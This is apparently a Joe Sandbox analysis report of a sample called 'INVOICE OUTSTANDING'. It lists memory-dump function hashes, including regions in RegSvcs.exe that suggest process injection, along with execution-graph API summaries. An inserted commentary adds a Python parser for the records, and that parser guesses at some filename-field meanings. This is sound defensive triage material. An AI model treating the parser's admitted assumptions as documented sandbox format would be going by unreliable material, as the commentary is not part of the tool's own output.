                                                                                                                          • API ID:
                                                                                                                          • String ID: 1odv
                                                                                                                          • API String ID: 0-2460989039
                                                                                                                          • Opcode ID: 6920d9a2f150fcff4675d471c2ab7d4a1c77b9addeb6eb2b565d6dab9c56f444
                                                                                                                          • Instruction ID: 2d5af9f17825edee8b7cddc3c82b4c3a18f6d40324df36e08d02b774813ed145
                                                                                                                          • Opcode Fuzzy Hash: 6920d9a2f150fcff4675d471c2ab7d4a1c77b9addeb6eb2b565d6dab9c56f444
                                                                                                                          • Instruction Fuzzy Hash: 67313BB0E112198BDF28CF96D8807EEFBF2BB88200F14D0AAD558E7354DB305A418F61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

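The records in this section are emitted by the Joe Sandbox IDA plugin, one per function recovered from a memory dump, and they are all keyed on the same few fields: the `.sdmp` source file and its load `Offset`, the `String ID` a function references (usually empty), the `API String ID` pair, the 64-hex `Opcode ID` / `Instruction ID` digests and the shorter fuzzy hashes. When triaging a report like this one it helps to turn the records into structured data so that the dumped regions (here `078B0000` and `014B0000`) can be compared for function count, referenced strings and hash overlap. The following parser is an added example and is not code from the report or from Joe Sandbox; the sample text is two records copied from this page with the report's indentation stripped, and the interpretation of the `.sdmp` name fields other than the base address (which is checked against `Offset`) is an assumption.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records and summarise them per dump region."""
import re
from collections import defaultdict

# Constructed sample: two records copied from the report, indentation removed.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: 1odv
• API String ID: 0-2460989039
• Opcode ID: 6920d9a2f150fcff4675d471c2ab7d4a1c77b9addeb6eb2b565d6dab9c56f444
• Instruction ID: 2d5af9f17825edee8b7cddc3c82b4c3a18f6d40324df36e08d02b774813ed145
• Opcode Fuzzy Hash: 6920d9a2f150fcff4675d471c2ab7d4a1c77b9addeb6eb2b565d6dab9c56f444
• Instruction Fuzzy Hash: 67313BB0E112198BDF28CF96D8807EEFBF2BB88200F14D0AAD558E7354DB305A418F61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ecb158cdd0b931cd3b1415c179c3e657c38455c01b69a09dd6cd0baf42e867a
• Instruction ID: ac991d5c08ffb7d4defb8563a535f78a370cfab3ddeffdc38e47107eef522e00
• Opcode Fuzzy Hash: 4ecb158cdd0b931cd3b1415c179c3e657c38455c01b69a09dd6cd0baf42e867a
• Instruction Fuzzy Hash: 0912B4F14117468BE732CF65E9985893BB1B765328FB0420AD2612FAF9D7BC114ACF48
Uniqueness

Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$"
)
# Dotted .sdmp name: the fourth field is the region base address (verified against Offset below);
# the meaning of the other fields is an assumption and they are only carried through as numbers.
SDMP_RE = re.compile(r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.")


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            current[m.group(1).strip()] = m.group(2).strip()
            continue
        m = SCORE_RE.match(line)
        if m:
            current["Uniqueness Score"] = float(m.group(1))
    return records


def parse_source(source_field):
    """Decode the 'Source File: ..., Offset: ..., based on PE: ...' value."""
    m = SOURCE_RE.match(source_field)
    if not m:
        raise ValueError(f"unrecognised Source File field: {source_field!r}")
    s = SDMP_RE.match(m.group("file"))
    if not s:
        raise ValueError(f"unrecognised .sdmp name: {m.group('file')!r}")
    return {
        "field1": int(s.group(1)), "field2": int(s.group(2)), "field3": int(s.group(3)),
        "base": int(s.group(4), 16),
        "offset": int(m.group("offset"), 16),
        "pe": m.group("pe") == "true",
    }


def parse_api_string_id(value):
    """'0-2460989039' -> (0, 2460989039); empty field -> None."""
    if not value:
        return None
    api_id, string_id = value.split("-", 1)
    return int(api_id), int(string_id)


def check_record(rec):
    """Sanity checks a reader would want before trusting a record: returns a list of problems."""
    problems = []
    src = parse_source(rec["Source File"])
    if src["base"] != src["offset"]:
        problems.append("dump base address does not match Offset")
    if rec.get("Opcode ID") != rec.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    for key in ("Opcode ID", "Instruction ID"):
        if not re.fullmatch(r"[0-9a-f]{64}", rec.get(key, "")):
            problems.append(f"{key} is not a 64-hex digest")
    return problems


def summarize_by_region(records):
    """Group records by dump Offset: function count, functions with a String ID, distinct opcode hashes."""
    regions = defaultdict(lambda: {"functions": 0, "with_strings": 0, "pe": None, "opcode_hashes": set()})
    for rec in records:
        src = parse_source(rec["Source File"])
        region = regions[src["offset"]]
        region["functions"] += 1
        region["pe"] = src["pe"]
        region["opcode_hashes"].add(rec["Opcode ID"])
        if rec.get("String ID"):
            region["with_strings"] += 1
    return dict(regions)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for off, info in summarize_by_region(recs).items():
        print(f"{off:08X}: {info['functions']} functions, {info['with_strings']} with strings, PE={info['pe']}")
    for rec in recs:
        print(rec["Instruction ID"][:16], check_record(rec) or "ok")
```

Run against the full report text instead of `SAMPLE` to see how many distinct functions each injected region holds and which ones carry string references; the `based on PE: false` flag on both regions tells you the dumps were not recognised as mapped PE images, so the function hashes, not PE metadata, are what you have to pivot on.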
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6e765d3c701746ddc897f3d993dd4e0b1df7bc2f9f57bde8c0a527b318109fb5
                                                                                                                          • Instruction ID: 059144ae4566a8911b338efe242f39e2307efa98969f050bdfb7d813a532efd1
                                                                                                                          • Opcode Fuzzy Hash: 6e765d3c701746ddc897f3d993dd4e0b1df7bc2f9f57bde8c0a527b318109fb5
                                                                                                                          • Instruction Fuzzy Hash: DBE1AFB0D1525ACFCB10DFA8D891ADDBBB1FF55304F20856AD404EB796EB30990ACB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ecb158cdd0b931cd3b1415c179c3e657c38455c01b69a09dd6cd0baf42e867a
                                                                                                                          • Instruction ID: ac991d5c08ffb7d4defb8563a535f78a370cfab3ddeffdc38e47107eef522e00
                                                                                                                          • Opcode Fuzzy Hash: 4ecb158cdd0b931cd3b1415c179c3e657c38455c01b69a09dd6cd0baf42e867a
                                                                                                                          • Instruction Fuzzy Hash: 0912B4F14117468BE732CF65E9985893BB1B765328FB0420AD2612FAF9D7BC114ACF48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b00af075dbf61e80c5ea7a5b5bc06a49e6471d008349b66a5b1cd9570923d3ec
                                                                                                                          • Instruction ID: ce8ae7676b3f5b100d4902552c29aa9a0659206e25dab3c375cffba70a3b7ccc
                                                                                                                          • Opcode Fuzzy Hash: b00af075dbf61e80c5ea7a5b5bc06a49e6471d008349b66a5b1cd9570923d3ec
                                                                                                                          • Instruction Fuzzy Hash: 86B160B4E1125ACFCB10DFA8D8819DEBBB2FF99304F208A69D405AB755DB309945CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f71528834a1ca2b724c232f92659884af8be6b021a0a2c277a9f2187c15837e8
                                                                                                                          • Instruction ID: d384a89b7428caf6b9cb7dc328176b5788627f3cfdedeeb7016ab99ce4b276c7
                                                                                                                          • Opcode Fuzzy Hash: f71528834a1ca2b724c232f92659884af8be6b021a0a2c277a9f2187c15837e8
                                                                                                                          • Instruction Fuzzy Hash: 40A16B36E0061ACFCF15DFA5C8845DEBBB2FFD9304B15816AE905BB221EB31A945CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ac53ae0761907f590c924134ebe4a2210081a948436234e6f59ce7089ba7890f
                                                                                                                          • Instruction ID: 0a7e5c4272d2b907f99f19f43e65bc765860e13eb23ccc8312f6446150098dd0
                                                                                                                          • Opcode Fuzzy Hash: ac53ae0761907f590c924134ebe4a2210081a948436234e6f59ce7089ba7890f
                                                                                                                          • Instruction Fuzzy Hash: 64B12EB4E1121ADFCB54DFA9D8819DDBBB2FF89304F208929D505AB754DB30A945CF80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 738aeab6e5ba362d2b1cabd475bab65e08bda1e7bc318fbfd2c9b2f7c34181cc
                                                                                                                          • Instruction ID: ce6f564cb7278cf3932581747e8332d88e9fca2556c8faa52ecaf18b84b9ad29
                                                                                                                          • Opcode Fuzzy Hash: 738aeab6e5ba362d2b1cabd475bab65e08bda1e7bc318fbfd2c9b2f7c34181cc
                                                                                                                          • Instruction Fuzzy Hash: DDC12DF18117468BE722DF65E8881897B71BBA5328F70430AD1612FAF8D7BC154ACF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6de3f3be4e7d0b15bf853eb4fdffa0d9a5b1876e57139c7bcd41e75b5631ef4f
                                                                                                                          • Instruction ID: e66367c2a0c491eef4a15a63fb563e5e48087004a56fdef468c7b6bb3370ce67
                                                                                                                          • Opcode Fuzzy Hash: 6de3f3be4e7d0b15bf853eb4fdffa0d9a5b1876e57139c7bcd41e75b5631ef4f
                                                                                                                          • Instruction Fuzzy Hash: 908102B4A1421A8FCB14CFA9C5809AEFBF1FF89310F54956AD415EB320D330AA06CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f739d293ae64a5541463e38edb4df542904e099b2ec46733a7aae828e8286851
                                                                                                                          • Instruction ID: 1824a8a1aa1dee266b913853a8ade15fe7fbe55c076b424a44e21e94da3cc283
                                                                                                                          • Opcode Fuzzy Hash: f739d293ae64a5541463e38edb4df542904e099b2ec46733a7aae828e8286851
                                                                                                                          • Instruction Fuzzy Hash: F691EFB4A1521A8FCB14CFA9C580A9EFBF1FF89314F54956AE415EB320D330AA46CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0afd3bd0c1529c01de6d9fe43a40b2010c28decaf2112f682035afaa46d0be08
                                                                                                                          • Instruction ID: ab52dea7b271a1017bbb395d655b84ea3e54fa8318b89722ce96520eee83dd69
                                                                                                                          • Opcode Fuzzy Hash: 0afd3bd0c1529c01de6d9fe43a40b2010c28decaf2112f682035afaa46d0be08
                                                                                                                          • Instruction Fuzzy Hash: 96613AB1E1421AAFCB04CFAAC4419EEFBF2AF89314F14D425D515E7354D77499418FA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e9743209a1bf8ef47a7583f4d305abd3084763afd31ea913806a8ee54fb57542
                                                                                                                          • Instruction ID: 81d2bbb155e4e3cc720dc05831b2ce17328f299d6bdbb54fec939998b7a715c8
                                                                                                                          • Opcode Fuzzy Hash: e9743209a1bf8ef47a7583f4d305abd3084763afd31ea913806a8ee54fb57542
                                                                                                                          • Instruction Fuzzy Hash: C8414CB0E152199BDB28CF9AD8806EEFBB2BB99310F14C16AD508F7354DB305A458F21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 15766c022f6dd7400d92f9a9f8ca58bba5ded47b5cadb1f50d561137de33d7ce
                                                                                                                          • Instruction ID: 28ae3c3cc903f036e4208d278c0c80e735b2cc4e1c1e4bb87a27a48b0219d28c
                                                                                                                          • Opcode Fuzzy Hash: 15766c022f6dd7400d92f9a9f8ca58bba5ded47b5cadb1f50d561137de33d7ce
                                                                                                                          • Instruction Fuzzy Hash: C24113B0E1420ADBCF04CFAAC9815DEFBB6BB89304F14C16AC405F7354D7349A028BA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
• String ID:
• API String ID:
• Opcode ID: 164a71706b161c90c8cf8ac3c5ae3bd33423c00c5f97c9b95f78ac0a28de5fde
• Instruction ID: 678ed317a49f61a3bd68fc0fda8c1bc0143332f53792507cbd8b2d0fd3c6976b
• Opcode Fuzzy Hash: 164a71706b161c90c8cf8ac3c5ae3bd33423c00c5f97c9b95f78ac0a28de5fde
• Instruction Fuzzy Hash: 0141D2B1E1420ADBCF04CFAAC9815EEFBB6BB99304F14D16AC405F7344D7349A418BA6
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c7f3f3d12aa1fe0ca0d458b192580481903cb10120bbc984bf3e3aefd79146d
• Instruction ID: 84f1800bde6c7a3af76ce3f69a11e48277b24171d08ba96c15dbfb602d1e4242
• Opcode Fuzzy Hash: 8c7f3f3d12aa1fe0ca0d458b192580481903cb10120bbc984bf3e3aefd79146d
• Instruction Fuzzy Hash: B62129B1E116298BDB18CFABD8416EEFBF7BFC8210F14C12AD518A7254DB304A018B61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff103c4087d75707b2546bbf788f3643ff999c62e0ee591d20767e6ece69cf52
• Instruction ID: 2cf3d81b3c4ca89e270b46fd6a3b5c08d9ddaee505ad5eeecb27fade850d93e9
• Opcode Fuzzy Hash: ff103c4087d75707b2546bbf788f3643ff999c62e0ee591d20767e6ece69cf52
• Instruction Fuzzy Hash: F511AAB1E156189BEB18CFABD8406DEFBF7AFC8210F04C17AC918A6214EB3415468F55
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3002ddb30e3f873b0ad3712e53e9be4a5b50baecd27c7ec131c09fbbfc7f428
• Instruction ID: 694e7232397a00d523700688914534df2f370b92984baf1a690a655dfc643da8
• Opcode Fuzzy Hash: e3002ddb30e3f873b0ad3712e53e9be4a5b50baecd27c7ec131c09fbbfc7f428
• Instruction Fuzzy Hash: 2111F1B1E106189BEB5CCF6BD8446DEFBF7AFC8200F04C07AC918A6255EB3455428F55
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1719892c5258f8b31964670bfb8f4b2d1d8f2edf93d47bc677bef52814c2831
• Instruction ID: 45d2f85b35b4a8f94b6ef3266711d8abfbb86debff4e2eddb5e5408add0ee9b5
• Opcode Fuzzy Hash: a1719892c5258f8b31964670bfb8f4b2d1d8f2edf93d47bc677bef52814c2831
• Instruction Fuzzy Hash: 4F014B70D04268CFDB14CFA9C4587EEBBF1AF8D315F18906AD445B3290D7788984CB68
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 2.7%
Total number of Nodes: 146
Total number of Limit Nodes: 9
execution_graph: [rendered graph; raw node/edge listing omitted as unrecoverable layout. Root nodes listed in the graph: 6d16970, 6c6b6a0, 6d1ca18, 169ad10, 1694090, 6c6e978, 6c691a8. API calls referenced by graph nodes: GlobalMemoryStatusEx, LdrInitializeThunk, DuplicateHandle, LoadLibraryA, RtlEncodePointer, RegQueryValueExW, RegOpenKeyExW.]
Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 169c92dd844ceb8c0f815cb97bb6453551c082d5bc54677adf4022113fd25723
• Instruction ID: 6f088325541a892cc2b3d66e9fbb30d0c7d2d1ff479e8a0ddcd22d8ee024f9d0
• Opcode Fuzzy Hash: 169c92dd844ceb8c0f815cb97bb6453551c082d5bc54677adf4022113fd25723
• Instruction Fuzzy Hash: 27530B30D1071A8ECB51EF68C884A99F7B1FF99314F15D69AE4587B221EB30AAC4CF51
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 8^k
• API String ID: 0-366859695
• Opcode ID: 6518375845c2f00a8b96551caac4a86bf9393fd5fb66c705bd7ebe8d04e2e8b5
• Instruction ID: 17095a8f3ee51dbef1713f82cc377f7206d91889bc1259200a2ee254c7f433d9
• Opcode Fuzzy Hash: 6518375845c2f00a8b96551caac4a86bf9393fd5fb66c705bd7ebe8d04e2e8b5
• Instruction Fuzzy Hash: 56829C30E146448FEFA4DBB8C8547ADB7A6AF85304F248079E10ADF395DB78D845CBA1
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 8^k
• API String ID: 0-366859695
• Opcode ID: 5ba8d2a925cb90ce9ad80d1bcc3ffa345ccdbb1152fcadbc14c112a1c2e64d37
• Instruction ID: 0f0b01e02322e815fcfe140fb8c4d49dc595b11123d28285a64461d6a43a8510
• Opcode Fuzzy Hash: 5ba8d2a925cb90ce9ad80d1bcc3ffa345ccdbb1152fcadbc14c112a1c2e64d37
• Instruction Fuzzy Hash: 6D326030E142488FEF64DFB8C4547ADBBB2AF85344F24C169D40A9F385DB749889CBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered graph; raw basic-block/edge listing omitted as unrecoverable layout. Function range 6c6b6a0-6c6b87e; internal calls to 6c6a6c0, 6c6a7e0, 6c65b60, 6c65cf0, 6c6821c; API call LdrInitializeThunk.]
APIs
Memory Dump Source
• Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f04ba424274508f4692411a4cdf3dadaa02fc3c03d2aff4ab254f0dc39ccc957
• Instruction ID: e1203cc55560bb6030847a605bdf8a40d7f0f02ffe0fe0c13b21f34b727bf025
• Opcode Fuzzy Hash: f04ba424274508f4692411a4cdf3dadaa02fc3c03d2aff4ab254f0dc39ccc957
• Instruction Fuzzy Hash: 9B51B571A102069FCB44EBB1D899AAEB7B6BF84314F148529E4129F394EF34D9048BA4
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e7b539db90aded302a8f2e09902e2befa3af86228aa2650e65ae2cc770d7e51
• Instruction ID: cde58d5ac93d288f225ce5a3a904599910ddc4619076c2722fd894dd4ee3b4b7
• Opcode Fuzzy Hash: 8e7b539db90aded302a8f2e09902e2befa3af86228aa2650e65ae2cc770d7e51
• Instruction Fuzzy Hash: 63C2CE34A043458FDB55EBB4E86866D7BF2AF89300F1980A9E449DF395EF349C46CB60
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 730c5af31110d0be9a92be17e41fb9d5862cd477f9a6b562bfb4df3c4212f20c
• Instruction ID: a12ccfa7f164446cc3090273fdcad4eb5050917eb6759d705a4dd76cc042cd30
• Opcode Fuzzy Hash: 730c5af31110d0be9a92be17e41fb9d5862cd477f9a6b562bfb4df3c4212f20c
• Instruction Fuzzy Hash: DD429F30F102098FDF64DBB9D4546AEB7B6EF89314F21842AD405DB385EB78DD428BA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1fbb48f950a1a2b6b0d9f610eea58937d7fd5a1a3cb42bd98700e38d97b6630b
• Instruction ID: e8cb95c0252b84208a2403581d7e31e9257368dbbd13a9a9c1e05593b5418656
• Opcode Fuzzy Hash: 1fbb48f950a1a2b6b0d9f610eea58937d7fd5a1a3cb42bd98700e38d97b6630b
• Instruction Fuzzy Hash: 7E22CC30F002459FEF55DBB8C854BAEBBF6AF89204F158569E005EB391DA34EC05CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c0473dd4dca309d594fc37cb9c7e6157c07a26151ec39e0a2809b58fc44f4cc9
                                                                                                                          • Instruction ID: 65b7601194285b9fdd3404cbc28ba986024b6f8e2bf334243a619f877b2c767f
                                                                                                                          • Opcode Fuzzy Hash: c0473dd4dca309d594fc37cb9c7e6157c07a26151ec39e0a2809b58fc44f4cc9
                                                                                                                          • Instruction Fuzzy Hash: 72E1B170F102494FEFA4DBA8E8547AE7BB6EB89310F26842BD005DB385DA78DC418771
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 59cb3f5e1a9b0aac6a359d68f436cc2406db35c8b7335f261d46dace7cd8b501
                                                                                                                          • Instruction ID: 62674e234c09168fbed840b71b8023ce60edcfe50f2fa77be29b4c3c01a1650a
